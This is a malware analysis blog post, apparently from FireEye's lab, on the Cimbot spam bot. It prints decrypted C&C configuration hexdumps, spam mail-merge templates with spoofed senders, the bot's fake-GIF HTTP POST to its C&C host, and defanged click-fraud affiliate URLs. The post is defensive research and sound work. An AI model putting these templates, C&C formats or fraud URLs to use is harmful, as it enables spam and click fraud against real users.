00000540 6e 75 77 2e 63 6f 6d 09 00 1b 00 00 00 19 00 52 |nuw.com........R|

00000550 65 66 65 72 65 72 3a 20 68 74 74 70 3a 2f 2f 6c |eferer: http://l|

00000560 65 6e 75 77 2e 63 6f 6d 09 00 02 00 00 00 00 00 |enuw.com........|

00000570 09 00 02 00 00 00 00 00 09 00 02 00 00 00 00 00 |................|

*

00000860 0a 00 04 00 00 00 80 1a 06 00 0b 00 01 00 00 00 |................|

00000870 01 0c 00 01 00 00 00 01 0c 01 01 00 00 00 01 0c |................|

00000880 02 01 00 00 00 02 0c 03 01 00 00 00 04 0c 04 01 |................|

00000890 00 00 00 03 0c 05 01 00 00 00 05 0c 06 01 00 00 |................|

000008a0 00 05 0c 07 01 00 00 00 05 0c 08 01 00 00 00 05 |................|

000008b0 0c 09 01 00 00 00 05 0d 00 01 00 00 00 01 0e 00 |................|

000008c0 04 00 00 00 50 c3 00 00 0f 00 01 00 00 00 01 11 |....P...........|

000008d0 00 28 00 00 00 26 00 2f 5e 28 5b 61 2d 7a 30 2d |.(...&./^([a-z0-|

000008e0 39 5c 2d 5d 7b 31 2c 32 34 7d 29 5c 2e 28 5b 61 |9\-]{1,24})\.([a|

000008f0 2d 7a 5c 2e 5d 7b 32 2c 37 7d 29 24 2f 11 00 3c |-z\.]{2,7})$/..<|

00000900 00 00 00 3a 00 2f 5e 28 5b 61 2d 7a 30 2d 39 5c |...:./^([a-z0-9\|

00000910 2e 5d 7b 31 2c 33 30 7d 29 5c 2e 28 5b 61 2d 7a |.]{1,30})\.([a-z|

00000920 30 2d 39 5c 2d 5d 7b 31 2c 32 34 7d 29 5c 2e 28 |0-9\-]{1,24})\.(|

00000930 5b 61 2d 7a 5c 2e 5d 7b 32 2c 37 7d 29 24 2f 12 |[a-z\.]{2,7})$/.|

00000940 00 47 00 00 00 45 00 2f 28 61 62 75 73 65 29 7c |.G...E./(abuse)||

00000950 28 61 64 6d 69 6e 29 7c 28 77 65 62 6d 61 73 74 |(admin)|(webmast|

00000960 65 72 29 7c 28 70 6f 73 74 6d 61 73 74 65 72 29 |er)|(postmaster)|

00000970 7c 28 68 65 6c 70 29 7c 28 68 6f 73 74 6d 61 73 ||(help)|(hostmas|

00000980 74 65 72 29 7c 28 73 70 61 6d 29 2f 13 00 04 00 |ter)|(spam)/....|

00000990 00 00 88 13 01 00 21 00 01 00 00 00 01 21 01 01 |......!......!..|

000009a0 00 00 00 01 21 02 01 00 00 00 02 21 03 01 00 00 |....!......!....|

000009b0 00 1e 21 04 01 00 00 00 06 21 05 01 00 00 00 07 |..!......!......|

000009c0 21 06 01 00 00 00 08 21 07 01 00 00 00 09 21 08 |!......!......!.|

000009d0 01 00 00 00 0a 21 09 01 00 00 00 0f 22 00 05 00 |.....!......"...|

000009e0 00 00 04 25 4d 46 25 23 00 01 00 00 00 01 24 00 |...%MF%#......$.|

000009f0 05 00 00 00 04 25 48 4e 25 25 00 02 00 00 00 64 |.....%HN%%.....d|

00000a00 00 26 00 04 00 00 00 30 75 00 00 27 00 08 00 00 |.&.....0u..'....|

00000a10 00 e0 93 04 00 a0 bb 0d 00 0f 22 00 00 00 1c 00 |..........".....|

00000a20 25 52 41 4e 44 5f 4c 5f 34 5f 38 25 2e 66 61 6b |%RAND_L_4_8%.fak|

00000a30 65 65 78 61 6d 70 6c 65 2e 63 6f 6d 0a 0b 0c 0d |eexample.com....|

00000a40 0a 01 00 00 00 03 20 06 00 00 00 5b d4 41 5e bb |...... ....[.A^.|

00000a50 01 |.|

00000a51

I'm not completely certain yet, but I think this is either performing

Referer spamming, or crawling the web collecting email addresses, or both.

The regular expressions are for filtering out certain file types, and

email boxes while it harvests. I'm guessing it picks the User-Agents at

random or in sequence or something. I can find out if anyone cares.

Googling for lenuw.com and devaw.com is left as an exercise for the

reader.

I've replaced the source IP address for my lab machine with 10.11.12.13 (0x0a, 0x0b, 0x0c, 0x0d),

and the reverse DNS name with fakeexample.com. (It's right at the very end

of the hexdump.) This is of course used by the bot to determine it's own IP

address when it's behind a NAT.

The %WHATEVERS% are the mail-merge template variables, that get filled in

by appropriate values while sending spam. From examination of the Cimbot binary itself,

these are all of the possible variables:

aRand_di_       db '%RAND_DI_',0        ; DATA XREF: sub_4070BB:loc_407E27↑o

aRand_lu_ db '%RAND_LU_',0 ; DATA XREF: sub_4070BB:loc_407CE0↑o

aRand_ldu_ db '%RAND_LDU_',0 ; DATA XREF: sub_4070BB:loc_407B99↑o

aRand_ld_ db '%RAND_LD_',0 ; DATA XREF: sub_4070BB:loc_407A52↑o

aRand_d_ db '%RAND_D_',0 ; DATA XREF: sub_4070BB:loc_40790B↑o

aRand_l_ db '%RAND_L_',0 ; DATA XREF: sub_4070BB:loc_4077C6↑o

aRand_char_ldu db '%RAND_CHAR_LDU%',0 ; DATA XREF: sub_4070BB:loc_407603↑o

aRand_char_lu db '%RAND_CHAR_LU%',0 ; DATA XREF: sub_4070BB:loc_4075A1↑o

aRand_char_ld db '%RAND_CHAR_LD%',0 ; DATA XREF: sub_4070BB:loc_40753F↑o

aRand_char_u db '%RAND_CHAR_U%',0 ; DATA XREF: sub_4070BB:loc_4074DD↑o

aRand_char_d db '%RAND_CHAR_D%',0 ; DATA XREF: sub_4070BB:loc_40747B↑o

aRand_char_l db '%RAND_CHAR_L%',0 ; DATA XREF: sub_4070BB:loc_40741B↑o

aRand_num db '%RAND_NUM%',0 ; DATA XREF: sub_4070BB:loc_4073A3↑o

aRand_guid db '%RAND_GUID%',0 ; DATA XREF: sub_4070BB:loc_407317↑o

aUnix_time db '%UNIX_TIME%',0 ; DATA XREF: sub_4070BB+33↑o

aOe db '%OE%',0 ; DATA XREF: sub_4090B6+8D2↑o

aDm db '%DM%',0 ; DATA XREF: sub_4090B6+81E↑o

aHs db '%HS%',0 ; DATA XREF: sub_4090B6+7EB↑o

aRc db '%RC%',0 ; DATA XREF: sub_4090B6+7DC↑o

aMf db '%MF%',0 ; DATA XREF: sub_4090B6+7CD↑o

aBi db '%BI%',0 ; DATA XREF: sub_4090B6+2CD↑o

aMp db '%MP%',0 ; DATA XREF: sub_4090B6+2BE↑o

aMh db '%MH%',0 ; DATA XREF: sub_4090B6+2AF↑o

aHn db '%HN%',0 ; DATA XREF: sub_4090B6+274↑o

aIp db '%IP%',0 ; DATA XREF: sub_4090B6+223↑o

Second Example

These are some of the the decoded spam

templates from the original .pcap I recieved.

One of the strings is like this:

Date: %UNIX_TIME% +0000

From: "Roeber Grossmann" <%MF%>

X-Mailer: The Bat! (3.62.11) Professional

Reply-To: Roeber Grossmann <%MF%>

X-Priority: 3 (Normal)

Message-ID: <1739770208.20090227075335@baberuth.com>

To: <%RC%>

Subject: More orgasmms

MIME-Version: 1.0

Content-Type: multipart/alternative;

boundary="----------5BA0A36C8AFBFE"

------------5BA0A36C8AFBFE

Content-Type: text/plain; charset=iso-8859-1

Content-Transfer-Encoding: quoted-printable

New Orgasm Enhancer

=09 =20

=09

Decades. There are schools in which the averages a troop

of monkeys ran chattering away and parrots of a better amusement

i sat on the roof to watch i was for some time his private

secretary, and at home in the evenings, he said. If not,

my servant.

------------5BA0A36C8AFBFE

Content-Type: text/html; charset=iso-8859-1

Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">=20

<html>

<head>

<title> </title> =20

<META http-equiv=3DContent-Type content=3D"text/html; charset=3D"iso-8859-1=

">=20

</head>

<body> <strong>

</strong><br><span name=3D"#wqqq"></span>New Orgasm Enhancer<br><br>Click=

=20

<a href=3D"http://cid-afbafcf33f10f80d.spaces.live.com/blog/cns!AFBAFCF33F1=

0F80D!107.entry">HERE</a><br><strong></strong><p><br></p><br>

<p><a name=3D"#qwww">

</a>Decades. There are schools in which the averages a troop<br> of monkeys=

ran chattering away and parrots of a better amusement<br> i sat on the roo=

f to watch i was for some time his private<br> secretary, and at home in th=

e evenings, he said. If not,<br> my servant.</p></body></html>

------------5BA0A36C8AFBFE--

And another string is like this, I think it's the %MF% Mail From

line:

domesticity@baberuth.com

Here's another, almost identical one:

The %MF% in this case is orthodontic@psnelling.co.uk. The server has

already done the work of generating an appropriate Message-ID (half of it is the current datetime). (And of

filling in most of the message with Markov-chain generated Bayesian filter poisoning text.)

From: "Valladores Malys" <%MF%>

X-Mailer: The Bat! (3.5.29) Professional

Reply-To: Valladores Malys <%MF%>

X-Priority: 3 (Normal)

Message-ID: <6465125974.20090227075649@psnelling.co.uk>

To: <%RC%>

Subject: More oorgasms

MIME-Version: 1.0

Content-Type: multipart/alternative;

boundary="----------BF59A1A8555AD2"

------------BF59A1A8555AD2

Content-Type: text/plain; charset=iso-8859-1

Content-Transfer-Encoding: quoted-printable

New Orgasm Enhanceer

=09

Moment in the cafe with maria, paredes, and the of sutasoma

as also all his quivers. Bowless, i wish to the devil i

had shared your room with they glowed on shirt bosoms and

morning as well it in the name of the sovereignty of massachusetts,.

------------BF59A1A8555AD2

Content-Type: text/html; charset=iso-8859-1

Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> =20

<html>

<head> <title> </title> =20

<META http-equiv=3DContent-Type content=3D"text/html; charset=3D"iso-8859-1=

"> =20

</head> =20

<body> <strong> </strong><br><br>New Orgasm Enhanceer<br><b> </b>Click=

=20

<a href=3D"http://cid-a66afb2a221a9923.spaces.live.com/blog/cns!A66AFB2A221=

A9923!106.entry">HERE</a><br><span>=09</span><p><br></p><b>=09</b>

<p><b> </b>Moment in the cafe with maria, paredes, and the of sutasoma<br=

>

as also all his quivers. Bowless, i wish to the devil i<br>

had shared your room with they glowed on shirt bosoms and<br>

morning as well it in the name of the sovereignty of massachusetts,.</p></b=

ody></html>

------------BF59A1A8555AD2--

There's one of these every 182 seconds (3 minutes). All of the From lines

are spoofed:

Message IDMAIL FROM String
Message-ID: <6001459618.20090227085953@influencemag.ca>checking@influencemag.ca
Message-ID: <9730083908.20090227090253@schindelar.cz>cerro@schindelar.cz
Message-ID: <1455429741.20090227170249@danatec.com>inosculate@danatec.com
Message-ID: <9435482259.20090227170557@4lifetech.com>jealousy@4lifetech.com
Message-ID: <3624447656.20090227170909@math.usc.edu>misroute@math.usc.edu
Message-ID: <5001423059.20090227171217@oelhauser.ch>sorters@oelhauser.ch
Message-ID: <5576779480.20090227171533@mulemusic.no>enflames@mulemusic.no
Message-ID: <4990128715.20090227171833@isphording.de>triumph@isphording.de
Message-ID: <8370838722.20090227172137@heltreidar.com>mineworker@heltreidar.com
Message-ID: <4380821286.20090227172445@ton-fabrik.de>sneezeweed@ton-fabrik.de
Message-ID: <1429782066.20090227172801@rhpresence.fr>machinizes@rhpresence.fr
Message-ID: <4640089897.20090227173105@backfire.co.uk>shoed@backfire.co.uk
Message-ID: <5239254299.20090227173413@tsv-hochdahl.de>sinistral@tsv-hochdahl.de
Message-ID: <2726249263.20090227173721@applewise.co.jp>animally@applewise.co.jp
Message-ID: <8024786915.20090227174337@leak-pro.com>precatory@leak-pro.com
Message-ID: <2495183162.20090227174642@lyprodan.com>racemises@lyprodan.com
Message-ID: <2410127594.20090227174946@7acres.com.au>colonist@7acres.com.au
Message-ID: <1101937854.20090227175306@encore21.net>excreter@encore21.net
Message-ID: <7294082901.20090227182630@gyep.com>jumbling@gyep.com
Message-ID: <4650255037.20090227182934@am-auto.cz>downwardness@am-auto.cz
Message-ID: <3289686325.20090227183238@kleine-wege.de>ostensory@kleine-wege.de

Other Stuff

I should also note that the bot reports its status back up to the C&C server

via a HTTP POST of a GIF, but I don't have anything else really

interesting to say about this (it's the same key as above, most of this

example is NULLs):

POST /account/p.php HTTP/1.1

Host: sufujilisi.info

Accept: */*

Content-Length: 97

Connection: close

Cookie: PHPSESSID=47d3066a386f5532af8a1d69c46c4896

00000000 47 49 46 38 39 61 f4 02 fe 01 21 bb ef b9 0f c8 |GIF89a....!.....|

00000010 40 4b 08 38 f1 1e 0f 8a 09 e9 83 55 79 2d 87 c6 |@K.8.......Uy-..|

00000020 3b 22 08 38 f1 1b 0f 8a 09 e9 a9 17 c1 e4 87 c6 |;".8............|

00000030 3b 22 08 38 f1 1b 0f 8a 09 e9 a3 17 c1 e4 8a e4 |;".8............|

00000040 3b 22 08 38 f1 1b 0f 8a 09 e9 a3 17 c1 e4 87 c6 |;".8............|

00000050 3b 22 08 38 f1 1b 0f 8a 09 0a |;".8......|

0000005a

Every fifty minutes, Cimbot will make HTTP requests to Affiliate click websites like this (there's no

User-Agent):

GET /index.php?ref=24364 HTTP/1.1

Host: www.paid2link.com

Accept: */*

Connection: close

And this is the complete list of affiliate URLs, "s/http/hxxp/g"-ified mostly just to prevent anymore clicks on them by web-crawling

machines.

hxxp://lecoquin.net/pages/index.php?refid=ec0lag

hxxp://www.paidclickings.com/default.asp?id=ec0lag

hxxp://www.dhcp-i386.biz/?ref=4912

hxxp://uniqwork.com/rjoin.asp?id=ec0lag

hxxp://www.ladyteapot.com/?refer=852

hxxp://www.dailypayouts.com/?ref=2130

hxxp://www.hotrusclick.com/signup.php?r=15293

hxxp://www.lionclix.com/index.php?ref=ec0lag

hxxp://www.megacashclicks.net/index.php?ref=ec0lag

hxxp://leapcash.com/signUp.php?ref=1945777

hxxp://www.birthdayclubptc.com/?r=ec0lag

hxxp://www.loo-promo.org/index.php?ref=381

hxxp://www.yep.com/Search2.aspx?keyword=exchange&agentID=321

hxxp://www.paid2link.com/index.php?ref=24364

hxxp://www.theadclick.com/pages/index.php?refid=ec0lag

hxxp://www.stormpay.com/?2523754

hxxp://www.joomcash.com/pages/index.php?refid=ec0lag

hxxp://www.onlineearningcenter.com/members/ec0lag

hxxp://www.carolina-clicks.com/pages/index.php?refid=ec0lag

hxxp://sb-money.com/monitor.php?kind=1&lang=0&user=352

hxxp://www.ruspromotion.net/site/index.php?ref=ec0lag

hxxp://www.kesefkal.net/ru/?refer=ec0lag

hxxp://getpaideventoday.com/index.php?i=1&ref=ec0lag

hxxp://www.clixnclix.net/index.php?ref=ec0lag

hxxp://www.TheGoldClick.Com/index.asp?ref=43256

hxxp://sunclicks.com/cgi-bin/reg.cgi?refid=ec0lag

hxxp://www.surfing4cash.info/index.php?ref=ec0lag

hxxp://www.trafficdinar.com/signup.php?r=5326

hxxp://www.egcash.com/index.php?refid=ec0lag

hxxp://leapcash.com/signUp.php?ref=ec0lag

hxxp://resource-a-day.net/member/index.cgi?tj42

hxxp://a.websponsors.com/c/s=16356/c=24323/

hxxp://www.alladvantage.com/go.asp?refid=ec0lag

Summary

Spamming, Email Harvesting, and Click Fraud about sums this up.

None of this is really new, except for the fake GIF headers on the C&C

communications.


Julia Wolf @ FireEye Malware Intelligence Lab

Questions/Comments to research [@] fireeye [.] com